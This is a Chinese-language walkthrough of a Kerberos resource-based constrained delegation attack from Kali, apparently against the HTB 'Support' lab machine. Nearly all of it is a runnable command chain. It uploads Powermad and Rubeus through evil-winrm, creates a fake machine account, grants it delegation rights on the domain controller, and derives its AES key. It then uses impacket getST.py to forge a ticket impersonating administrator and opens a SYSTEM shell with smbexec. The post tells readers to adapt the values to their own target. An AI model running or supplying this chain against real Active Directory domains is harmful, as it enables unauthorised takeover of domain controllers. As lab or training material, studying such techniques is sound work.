kali之约束委派攻击

用到的工具

Powermad.ps1：https://github.com/Kevin-Robertson/Powermad
Rubeus.exe：https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
impacket工具包：https://github.com/fortra/impacket

Evil-Winrm : Winrm Pentesting Framework（远程渗透管理工具）

安装：gem install evil-winrm
约束委派攻击

前提：通过Evil-Winrm工具获取到目标机器的普通权限

注意：（以下命令参数值根据实际情况进行修改）

上传提权所用的文件到目标机

1. upload /root/Desktop/kerberos/Powermad/Powermad.ps1
2. upload /root/Desktop/kerberos/Ghostpack-CompiledBinaries/Rubeus.exe
3. Import-Module ./Powermad.ps1  # 导入模块命令

复制代码

1. # 设置参数
2. Set-Variable -Name "FakePC" -Value "FAKE01"  # FAKE01这个名字可以自己改
3. Set-Variable -Name "targetComputer" -Value "DC"

复制代码

创建一个新用户（执行如下命令，会创建一个FAKE01用户）
New-MachineAccount -MachineAccount (Get-Variable -Name "FakePC").Value -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

1. # 设置权限
2. Set-ADComputer (Get-Variable -Name "targetComputer").Value -PrincipalsAllowedToDelegateToAccount ((Get-Variable -Name "FakePC").Value + '$')
4. # 检查是否工作
5. Get-ADComputer (Get-Variable -Name "targetComputer").Value -Properties PrincipalsAllowedToDelegateToAccount

复制代码

生成hash，aes256
./Rubeus.exe hash /password:123456 /user:FAKE01$ /domain:support.htb

kali执行如下（根据实际情况进行修改）

1. # 添加hosts文件
2. echo "10.10.11.174 support.htb" >> /etc/hosts
3. echo "10.10.11.174 dc.support.htb" >> /etc/hosts
5. # 生成TGT票据
6. python3 getST.py support.htb/FAKE01 -dc-ip dc.support.htb -impersonate administrator -spn http/dc.support.htb -aesKey 35CE465C01BC1577DE3410452165E5244779C17B64E6D89459C1EC3C8DAA362B
8. # 添加票据
9. export KRB5CCNAME=administrator.ccache
11. # 连接机器
12. smbexec.py support.htb/administrator@dc.support.htb -no-pass -k

复制代码

成功获取系统权限


免责声明：如果侵犯了您的权益，请联系站长，我们会及时删除侵权内容，谢谢合作！